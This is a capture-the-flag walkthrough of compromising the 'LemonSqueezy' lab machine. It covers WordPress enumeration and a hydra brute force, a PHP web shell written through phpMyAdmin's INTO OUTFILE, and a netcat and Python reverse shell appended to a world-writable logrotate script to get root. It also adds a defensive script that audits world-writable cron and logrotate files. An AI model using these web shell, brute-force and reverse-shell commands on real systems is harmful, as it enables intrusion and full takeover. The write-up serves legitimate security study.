This includes enumerating WordPress and phpMyAdmin to get the user shell and then exploiting a cron job running on the machine to get root. I’ve added the machine to my hosts file. Let’s dive in.

root@kali:~# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
192.168.1.12 lemonsqueezy
I started the reconnaissance with an Nmap port scan, running the default scripts and service version detection.

root@kali:~# nmap -sC -sV -oA nmap/LemonSqueezy lemonsqueezy
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-15 16:12 IST
Nmap scan report for lemonsqueezy (192.168.1.12)
Host is up (0.00036s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 08:00:27:72:86:BF (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.52 seconds
Only port 80 was open, serving the default Apache2 page. Next, I used Gobuster to search for hidden directories and found two, named wordpress and phpmyadmin.

I decided to enumerate the wordpress directory first, which was running a default WordPress theme.

I ran wpscan to enumerate WordPress users and found two, named lemon and orange.

root@kali:~# wpscan --url http://lemonsqueezy/wordpress/ --enumerate u
...
[i] User(s) Identified:

[+] lemon
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://lemonsqueezy/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] orange
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
...
The next goal was to log into WordPress. I tried a few random passwords with both usernames, but none of them worked, so the next option was to brute force the login. For this, I set up a Burp proxy and captured the login request.

Then I used hydra to brute force the login for the user orange and found the password ginger.

root@kali:~# hydra lemonsqueezy http-form-post "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^:incorrect" -l orange -P /usr/share/wordlists/rockyou.txt -t 10 -w 30
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-06-15 16:19:50
[DATA] max 10 tasks per 1 server, overall 10 tasks, 14344399 login tries (l:1/p:14344399), ~1434440 tries per task
[DATA] attacking http-post-form://lemonsqueezy:80/wordpress/wp-login.php:log=^USER^&pwd=^PASS^:incorrect
[http-post-form] host: lemonsqueezy   login: orange   password: ginger
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-06-15 16:20:05
After logging in as user orange, I found a post draft named “Keep this Safe” which contained some text, most probably a password.
After some guesses, I found that this password worked on the phpMyAdmin page with the username orange and the password nOt1n@wOrdl1st!

Then I went to the SQL tab, where SQL queries can be executed against the local database server, and created a simple PHP backdoor.
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/wordpress/backdoor.php"
The query executed without any errors. Then I browsed to the location where the backdoor had been written and executed the id command.
That was a success! Now it was time to get a netcat reverse shell back to the host machine and read our first flag!
root@kali:~# nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.1.11] from (UNKNOWN) [192.168.1.12] 50462
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@lemonsqueezy:/var/www/html/wordpress$ cd /var/www/
cd /var/www
www-data@lemonsqueezy:/var/www$ cat user.txt
cat user.txt
TXVzaWMgY2FuIGNoYW5nZSB5b3VyIGxpZmUsIH
www-data@lemonsqueezy:/var/www$
For further enumeration, I uploaded the pspy binary to look for running processes. To transfer the file, I started a Python HTTP server on my host machine and then downloaded it with wget on the target machine.

root@kali:~# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

www-data@lemonsqueezy:/home/orange$ cd /dev/shm
cd /dev/shm
www-data@lemonsqueezy:/dev/shm$ wget http://192.168.1.11:8000/pspy64
wget http://192.168.1.11:8000/pspy64
--2020-06-15 20:31:41--  http://192.168.1.11:8000/pspy64
Connecting to 192.168.1.11:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: 'pspy64'

pspy64              100%[===================>]   2.94M  --.-KB/s    in 0.04s

2020-06-15 20:31:41 (82.9 MB/s) - 'pspy64' saved [3078592/3078592]

www-data@lemonsqueezy:/dev/shm$ chmod +x pspy64
chmod +x pspy64
Then I gave it executable permissions and, after running it, found a logrotate process running as root that repeats at regular intervals.

I went to the /etc/logrotate.d/ directory and found that logrotate there is a Python script that is world-writable.

www-data@lemonsqueezy:/dev/shm$ cd /etc/logrotate.d/
cd /etc/logrotate.d/
www-data@lemonsqueezy:/etc/logrotate.d$ ls -lah
ls -lah
total 56K
drwxr-xr-x   2 root root 4.0K Apr 26 14:45 .
drwxr-xr-x 122 root root  12K Jun 15 20:07 ..
-rw-r--r--   1 root root  433 Oct 14  2019 apache2
-rw-r--r--   1 root root  173 Sep 14  2017 apt
-rw-r--r--   1 root root  107 Sep 21  2016 dbconfig-common
-rw-r--r--   1 root root  232 Jun 10  2015 dpkg
-rwxrwxrwx   1 root root  101 Apr 26 14:45 logrotate
-rw-r--r--   1 root root  802 Jan 29 16:49 mysql-server
-rw-r--r--   1 root root   94 Feb 21 07:38 ppp
-rw-r--r--   1 root root  515 Jan 19  2017 rsyslog
-rw-r--r--   1 root root  513 Aug  2  2017 speech-dispatcher
-rw-r--r--   1 root root  235 Dec 11  2016 unattended-upgrades
www-data@lemonsqueezy:/etc/logrotate.d$ file logrotate
file logrotate
logrotate: Python script, ASCII text executable
www-data@lemonsqueezy:/etc/logrotate.d$
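The root cause here is a single permission bit: a file that root consumes on a schedule is writable by every local user. The audit below is an added example, not code from the original walkthrough; it walks the Debian directories whose contents root runs or parses periodically and reports anything with the other-write bit set, including the directories themselves. The list of directories is an assumption for a Debian-style host, and make_demo_dir() builds a constructed fixture that mirrors the listing above so the script demonstrates a hit offline.

```python
import os
import stat
import tempfile

# Directories whose contents root runs or parses on a schedule (Debian defaults).
# Anything writable here is effectively under the control of every local user.
ROOT_RUN_DIRS = ["/etc/cron.d", "/etc/cron.daily", "/etc/cron.hourly",
                 "/etc/cron.weekly", "/etc/cron.monthly", "/etc/logrotate.d"]

def world_writable(path):
    """True if `path` resolves to something any user can modify (the o+w bit)."""
    try:
        st = os.stat(path)      # follows symlinks: what matters is what root reads
    except OSError:
        return False
    return bool(st.st_mode & stat.S_IWOTH)

def audit(dirs=ROOT_RUN_DIRS):
    """Return [(path, mode_string)] for each world-writable entry in `dirs`.
    The directory itself is checked too: a writable directory lets anyone add a job."""
    findings = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for p in [d] + [os.path.join(d, n) for n in sorted(os.listdir(d))]:
            if world_writable(p):
                findings.append((p, stat.filemode(os.stat(p).st_mode)))
    return findings

def make_demo_dir():
    """Constructed fixture mirroring the listing above: a 0777 'logrotate' next to
    a normal 0644 'apache2'. Returns (dir, path_of_the_writable_file)."""
    d = tempfile.mkdtemp(prefix="logrotate.d-demo-")
    for name, mode in (("apache2", 0o644), ("logrotate", 0o777)):
        p = os.path.join(d, name)
        with open(p, "w") as fh:
            fh.write("# placeholder\n")
        os.chmod(p, mode)
    return d, os.path.join(d, "logrotate")

if __name__ == "__main__":
    demo_dir, _ = make_demo_dir()
    for path, mode in audit(ROOT_RUN_DIRS + [demo_dir]):
        print(f"{mode} {path}  <- writable by any local user, consumed by root")
```

On the box in this walkthrough the same check would report /etc/logrotate.d/logrotate as -rwxrwxrwx; the fix is simply chmod 755 (and a periodic run of the audit to catch regressions).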
I replaced the contents of logrotate with a Python reverse shell and opened a listener in another terminal.
www-data@lemonsqueezy:/etc/logrotate.d$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.11",9000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' >> logrotate
Within a few minutes, a reverse shell popped in and I was able to read the final flag!
root@kali:~# nc -lvnp 9000
listening on [any] 9000 ...
connect to [192.168.1.11] from (UNKNOWN) [192.168.1.12] 58776
root@lemonsqueezy:~# cat root.txt
cat root.txt
NvbWV0aW1lcyBhZ2FpbnN0IHlvdXIgd2lsbC4=
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Ekaterina Rogova.